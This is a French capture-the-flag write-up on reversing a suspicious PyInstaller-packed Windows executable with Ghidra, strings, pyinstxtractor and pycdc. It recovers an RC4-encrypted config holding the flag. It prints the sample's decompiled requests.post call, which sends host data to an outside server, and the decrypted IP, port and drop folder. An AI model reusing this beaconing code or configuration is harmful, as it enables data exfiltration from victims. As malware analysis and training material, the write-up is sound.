NoBrackets2025ReverseMedium

A suspicious file

Votre collègue en réponse à incident a trouvé un exécutable suspect. Il vous confie la tâche de l'analyser.

bowie41

#reverse#pyinstaller#crypto

Pour ce challenge, on ne nous donne qu'un fichier executable.

Analyse

Avant toute chose, il est toujours une bonne idée de run la commande suivante pour avoir une premiere idée de avec quoi on travaille :

terminal
bash
$- file ./explorer.exe
./explorer.exe: PE32+ executable (console) x86-64, for MS Windows, 7 sections

Note : on n'utilise pas ici la commande checksec car a priori, on ne va pas avoir besoin d'exploiter le binaire.

Il s'agit donc d'un executable x86-64 PE32+ pour Windows.

Premiere méthode

Sans perdre plus de temps, on met l'executable dans un logiciel de reverse engineering. Ici j'utilise ghidra mais ca devrait aussi marcher avec IDA, BinaryNinja ou autres.

Apres avoir laissé ghidra analyser le fichier, il identifie directement la fonction entry, qui correspond à la 1ere fonction éxécutée :

void entry(void)

{
  FUN_14000d190();
  FUN_14000cdac();
  return;
}

Le programme semble donc executer FUN_14000d190 puis FUN_14000cdac, on va donc voir ce que fait la premiere fonction :

void FUN_14000d190(void)

{
  DWORD DVar1;
  _FILETIME local_res8;
  LARGE_INTEGER local_res10;
  _FILETIME local_18 [2];
  
  if (DAT_140043040 == 0x2b992ddfa232) {
    local_res8.dwLowDateTime = 0;
    local_res8.dwHighDateTime = 0;
    GetSystemTimeAsFileTime(&local_res8);
    local_18[0] = local_res8;
    DVar1 = GetCurrentThreadId();
    local_18[0] = (_FILETIME)((ulonglong)local_18[0] ^ (ulonglong)DVar1);
    DVar1 = GetCurrentProcessId();
    local_18[0] = (_FILETIME)((ulonglong)local_18[0] ^ (ulonglong)DVar1);
    QueryPerformanceCounter(&local_res10);
    DAT_140043040 =
         ((ulonglong)local_res10.s.LowPart << 0x20 ^
          CONCAT44(local_res10.s.HighPart,local_res10.s.LowPart) ^ (ulonglong)local_18[0] ^
         (ulonglong)local_18) & 0xffffffffffff;
    if (DAT_140043040 == 0x2b992ddfa232) {
      DAT_140043040 = 0x2b992ddfa233;
    }
  }
  DAT_140043080 = ~DAT_140043040;
  return;
}

Apres un peu de reflexion, on se rend compte que cette fonction génère juste un nombre pseudo-aléatoire en prenant :

L'heure -> GetSystemTimeAsFileTime
L'ID du thread -> GetCurrentThreadId
L'ID du process -> GetCurrentProcessId
Le compteur de performance -> QueryPerformanceCounter

Puis en faisant des opérations mathématiques mysterieuses avec (à base de XOR).

Puis stocke le résultat dans DAT_140043040 et son complément à deux dans DAT_140043080 :

DAT_140043040 =
         ((ulonglong)local_res10.s.LowPart << 0x20 ^
          CONCAT44(local_res10.s.HighPart,local_res10.s.LowPart) ^ (ulonglong)local_18[0] ^
         (ulonglong)local_18) & 0xffffffffffff;

DAT_140043080 = ~DAT_140043040;

Rien d'interessant donc dans cette fonction. On va ensuite voir FUN_14000cdac :

ulonglong FUN_14000cdac(void)

{
  code *pcVar1;
  bool bVar2;
  bool bVar3;
  uint uVar4;
  undefined8 uVar5;
  undefined8 uVar6;
  longlong *plVar7;
  ulonglong uVar8;
  ulonglong *puVar9;
  undefined8 *puVar10;
  undefined4 *puVar11;
  undefined8 unaff_RBX;
  undefined8 in_R9;
  
  uVar4 = (uint)unaff_RBX;
  uVar5 = FUN_14000cf8c(1);
  if ((char)uVar5 == '\0') {
    FUN_14000d2b0(7);
  }
  else {
    bVar2 = false;
    uVar5 = __scrt_acquire_startup_lock();
    uVar4 = (uint)CONCAT71((int7)((ulonglong)unaff_RBX >> 8),(char)uVar5);
    if (DAT_140047330 != 1) {
      if (DAT_140047330 == 0) {
        DAT_140047330 = 1;
        uVar6 = FUN_14001beb0((undefined8 *)&DAT_14002f468,(undefined8 *)&DAT_14002f4a8);
        if ((int)uVar6 != 0) {
          return 0xff;
        }
        FUN_14001be78((undefined8 *)&DAT_14002f450,(undefined8 *)&DAT_14002f460);
        DAT_140047330 = 2;
      }
      else {
        bVar2 = true;
      }
      __scrt_release_startup_lock((char)uVar5);
      plVar7 = (longlong *)FUN_14000d294();
      if ((*plVar7 != 0) && (uVar8 = FUN_14000d054((longlong)plVar7), (char)uVar8 != '\0')) {
        (*(code *)*plVar7)(0,2);
      }
      puVar9 = (ulonglong *)FUN_14000d29c();
      if ((*puVar9 != 0) && (uVar8 = FUN_14000d054((longlong)puVar9), (char)uVar8 != '\0')) {
        FUN_14001c190(*puVar9);
      }
      uVar6 = FUN_14001be20();
      puVar10 = FUN_14001c360();
      uVar5 = *puVar10;
      puVar11 = (undefined4 *)FUN_14001c358();
      uVar4 = FUN_140001000(*puVar11,uVar5,uVar6,in_R9);
      bVar3 = FUN_14000d404();
      if (bVar3) {
        if (!bVar2) {
          FUN_14001c174();
        }
        __scrt_uninitialize_crt(true,'\0');
        return (ulonglong)uVar4;
      }
      goto LAB_14000cf18;
    }
  }
  FUN_14000d2b0(7);
LAB_14000cf18:
  FUN_14001c1cc(uVar4);
  FUN_14001c184(uVar4);
  pcVar1 = (code *)swi(3);
  uVar8 = (*pcVar1)();
  return uVar8;
}

Oula. Plein d'appels à plein de fonctions.

En jetant un coup d'oeil aux différentes fonctions appelées, on tombe sur :

FUN_140001000 qui appelle FUN_140003f80 :

void FUN_140003f80(wchar_t **param_1,undefined8 param_2,undefined8 param_3,undefined8 param_4)

{

TRES LONGUE FONCTION

}

Je ne vais même pas essayer de comprendre ce que fait cette fonction, mais on trouve a de multiples reprises des chaines de caracteres faisant référence à PYI :

eVar5 = FUN_140008e40("_PYI_APPLICATION_HOME_DIR",(LPCSTR)ppwVar16);
ppwVar13 = (wchar_t **)FUN_140008d30("_PYI_APPLICATION_HOME_DIR");
pcVar8 = "_PYI_APPLICATION_HOME_DIR environment variable is not defined!\n";

Et il se trouve que PYI est un programme permettant de prendre un script python et d'en faire un executable.

Note : c'est comme ca que j'ai fait pour résoudre le chall, mais en écrivant ce wu je me suis rendu compte que j'aurais pu utiliser une méthode bien moins hasardeuse.

Deuxieme méthode

Avant d'analyser un executable, il est toujours préférable de run la commande strings pour voir les chaines de caracteres qu'il contient :

terminal
bash
$ strings ./explorer.exe | grep PYI  # J'utilise ici grep car l'output serait gigantesque
                                     # sinon mais c'est juste pour montrer qu'on trouve PYI
[PYI-%d:%s]
[PYI-%d:ERROR]
Absolute path to script exceeds PYI_PATH_MAX
PYINSTALLER_SUPPRESS_SPLASH_SCREEN
PYINSTALLER_RESET_ENVIRONMENT
_PYI_ARCHIVE_FILE
_PYI_APPLICATION_HOME_DIR
_PYI_PARENT_PROCESS_LEVEL
_PYI_SPLASH_IPC
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s
Failed to set _PYI_PARENT_PROCESS_LEVEL environment variable!
PYINSTALLER_STRICT_UNPACK_MODE
_PYI_APPLICATION_HOME_DIR environment variable is not defined!
Path exceeds PYI_PATH_MAX limit.

En trouvant des instances de la chaine "PYI", on se rends également compte que le fichier a été généré par PYInstaller.

Décompilation

Une fois qu'on sait qu'il s'agit d'un executable généré par PYInstaller, il est facile de trouver un outil pour le décompiler : pyinstxtractor

terminal
bash
$- python3 pyinstxtractor.py ./explorer.exe
[+] Processing ./explorer.exe
[+] Pyinstaller version: 2.1+
[+] Python version: 3.8
[+] Length of package: 8941181 bytes
[+] Found 133 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_setuptools.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_multiprocessing.pyc
[+] Possible entry point: pyi_rth_pkgres.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: explorer.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.8 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: ./explorer.exe

You can now use a python decompiler on the pyc files within the extracted directory

On constate que pyinstxtractor à créé un dossier explorer.exe_extracted avec plein de fichiers dedans :

terminal
bash
$ ls ./explorer.exe_extracted/
Crypto                                    api-ms-win-core-localization-l1-2-0.dll        api-ms-win-crt-utility-l1-1-0.dll
PYZ.pyz                                   api-ms-win-core-memory-l1-1-0.dll              base_library.zip

(...)

api-ms-win-core-interlocked-l1-1-0.dll    api-ms-win-crt-string-l1-1-0.dll               ucrtbase.dll
api-ms-win-core-libraryloader-l1-1-0.dll  api-ms-win-crt-time-l1-1-0.dll                 unicodedata.pyd

Le seul fichier qui nous interesse est celui qui porte le nom de l'executable de base avec l'extension .pyc soit ici "explorer.pyc" :

terminal
bash
$- file ./explorer.exe_extracted/explorer.pyc
./explorer.exe_extracted/explorer.pyc: Byte-compiled Python module for CPython 3.8, timestamp-based, .py timestamp: Thu Jan  1 00:00:00 1970 UTC, .py size: 0 bytes

Il s'agit d'un fichier PYthon Compilé (PYC). A partir de là, il est facile de le décompiler. Il existe plusieurs outils pour cela comme :

pycdc
uncompyle6
decompyle3
Et surement plein d'autres...

J'utilise ici pycdc :

terminal
bash
$ pycdc ./explorer.exe_extracted/explorer.pyc -o ./explorer.py  # je spécifie le fichier d'output
                                                                # ./explorer.py
Warning: block stack is not empty!
Unsupported opcode: BEGIN_FINALLY (97)
Unsupported opcode: BEGIN_FINALLY (97)
Unsupported opcode: BEGIN_FINALLY (97)
Unsupported opcode: BEGIN_FINALLY (97)
Warning: block stack is not empty!

On a quelques warnings mais pas d'erreur et notre fichier explorer.py est bel et bien créé.

Le code est un peu long, mais en cherchant "flag" dedans on tombe sur :

r = requests.post(f'''http://{c['ip']}:{c['port']}''', {
        'id': str(i),
        'vs': v,
        'os': o,
        'f': c['flag'],
        'data': d }, {
        'User-Agent': c['user-agent'] }, **('data', 'headers'))

Le script envoie donc une requete POST et dans cette requete, on trouve l'expression

'f': c['flag']

Qui suggère que le dictionnaire c possède une clé flag. Cela nous pousse à comprendre que le flag est contenu dans ce dictionnaire.

On cherche donc où et comment il est défini :

c = None   # définition au début du programme

def mmm():
    global c
    encrypted_bytes = base64.b64decode(__)
    cipher = ARC4.new(____.encode())
    decrypted_bytes = cipher.decrypt(encrypted_bytes)
    c = json.loads(decrypted_bytes.decode())

Pour creer c, le script appelle plusieurs fonction de crypto et les applique sur les variables __ et ____ qui sont définies plus haut :

__ = 'e7sNFfPHrs/XuTYgCLZ0mrpo2gqI+dd/3+VzO+ySng/8Na (...) TncRaGl2bTrn0N'
____ = '4b69742f3533372e333620284b48544d4c2c206c696b652047'

Note : le (...) symbolise que la valeur est tres longue.

Une fois qu'on a tout ça, il ne nous reste plus qu'a le copier (avec les import) et à l'executer en local pour voir à quoi est égal c :

Bac à sable Python 3.10.0
def rc4(k,d):
    """La sandbox ayant du mal avec le module Crypto, voila une fonction de rc4
    rédigée par chatgpt (ça fait la même chose que le code original)"""
    A,C,F,E=list(range(256)),0,len(k),bytearray(len(d))
    for B in range(256):C=C+A[B]+k[B%F]&255;A[B],A[C]=A[C],A[B]
    B=C=0
    for(G,H)in enumerate(d):B=B+1&255;C=C+A[B]&255;A[B],A[C]=A[C],A[B];I=A[A[B]+A[C]&255];E[G]=H^I
    return bytes(E)

import json, base64

c = None
__ = 'e7sNFfPHrs/XuTYgCLZ0mrpo2gqI+dd/3+VzO+ySng/8NaTD+Z4pMV6B39Qj9IgZElG7GcRpfEZD4sUoxhyQNAM4chxVCGW4tVDpV8Px7AAH8ZXKTmHsNW3W2zn9Dazw8AtiHKVkINfUHnUbR15aw9EnK4tqKy5Igl0XEKIWyvnwms0hu8XqaiWrJphgmt5CT1BtJJv/id46LqGJBZ7UhV6FesdzKGMkzihtCA1Pp17SPd7GRukwFB/Tyq5huiHAyoKF6Ld3/DJ9+JTD1u/CobI8xiWosSPZBEksqSub83XfzxjvTKqsJwKFJ0iCfIMXPmsXFhDZi79pdGTncRaGl2bTrn0N'
____ = '4b69742f3533372e333620284b48544d4c2c206c696b652047'

encrypted_bytes = base64.b64decode(__)
decrypted_bytes = rc4(____.encode(), encrypted_bytes)
c = json.loads(decrypted_bytes.decode())

print(f"Dictionnaire c : {c}")
print(f"Flag : {c['flag']}")

def rc4(k,d):
    """La sandbox ayant du mal avec le module Crypto, voila une fonction de rc4
    rédigée par chatgpt (ça fait la même chose que le code original)"""
    A,C,F,E=list(range(256)),0,len(k),bytearray(len(d))
    for B in range(256):C=C+A[B]+k[B%F]&255;A[B],A[C]=A[C],A[B]
    B=C=0
    for(G,H)in enumerate(d):B=B+1&255;C=C+A[B]&255;A[B],A[C]=A[C],A[B];I=A[A[B]+A[C]&255];E[G]=H^I
    return bytes(E)

import json, base64

c = None
__ = 'e7sNFfPHrs/XuTYgCLZ0mrpo2gqI+dd/3+VzO+ySng/8NaTD+Z4pMV6B39Qj9IgZElG7GcRpfEZD4sUoxhyQNAM4chxVCGW4tVDpV8Px7AAH8ZXKTmHsNW3W2zn9Dazw8AtiHKVkINfUHnUbR15aw9EnK4tqKy5Igl0XEKIWyvnwms0hu8XqaiWrJphgmt5CT1BtJJv/id46LqGJBZ7UhV6FesdzKGMkzihtCA1Pp17SPd7GRukwFB/Tyq5huiHAyoKF6Ld3/DJ9+JTD1u/CobI8xiWosSPZBEksqSub83XfzxjvTKqsJwKFJ0iCfIMXPmsXFhDZi79pdGTncRaGl2bTrn0N'
____ = '4b69742f3533372e333620284b48544d4c2c206c696b652047'

encrypted_bytes = base64.b64decode(__)
decrypted_bytes = rc4(____.encode(), encrypted_bytes)
c = json.loads(decrypted_bytes.decode())

print(f"Dictionnaire c : {c}")
print(f"Flag : {c['flag']}")

Note : il est important de n'executer que cette partie du code et pas le reste car, après tout, il s'agit d'un malware :)

Si on veut vraiment rester fidèle au script original, il suffit d'executer ce code python :

import base64, json
from Crypto.Cipher import ARC4

__ = 'e7sNFfPHrs/XuTYgCLZ0mrpo2gqI+dd/3+VzO+ySng/8NaTD+Z4pMV6B39Qj9IgZElG7GcRpfEZD4sUoxhyQNAM4chxVCGW4tVDpV8Px7AAH8ZXKTmHsNW3W2zn9Dazw8AtiHKVkINfUHnUbR15aw9EnK4tqKy5Igl0XEKIWyvnwms0hu8XqaiWrJphgmt5CT1BtJJv/id46LqGJBZ7UhV6FesdzKGMkzihtCA1Pp17SPd7GRukwFB/Tyq5huiHAyoKF6Ld3/DJ9+JTD1u/CobI8xiWosSPZBEksqSub83XfzxjvTKqsJwKFJ0iCfIMXPmsXFhDZi79pdGTncRaGl2bTrn0N'
____ = '4b69742f3533372e333620284b48544d4c2c206c696b652047'

encrypted_bytes = base64.b64decode(__)
cipher = ARC4.new(____.encode())
decrypted_bytes = cipher.decrypt(encrypted_bytes)
c = json.loads(decrypted_bytes.decode())

print(f"Dictionnaire c : {c}")
print(f"Flag : {c['flag']}")

terminal
bash
$- python3 exploit.py
Dictionnaire c : {'ip': '163.172.72.190', 'port': 4569, 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3', 'flag': 'NBCTF{this_file_seems_suspicious}', 'dwd_folder': '%appdata%/local/temp/dadq58aef4/'}
Flag : NBCTF{this_file_seems_suspicious}

Honnetement j'ai perdu beacoup de temps dans ghidra lors de la résolution de ce chall mais sinon plutôt fun :3

AnalysePartager Analyse

Premiere méthodePartager Premiere méthode

Deuxieme méthodePartager Deuxieme méthode

DécompilationPartager Décompilation

Analyse

Premiere méthode

Deuxieme méthode

Décompilation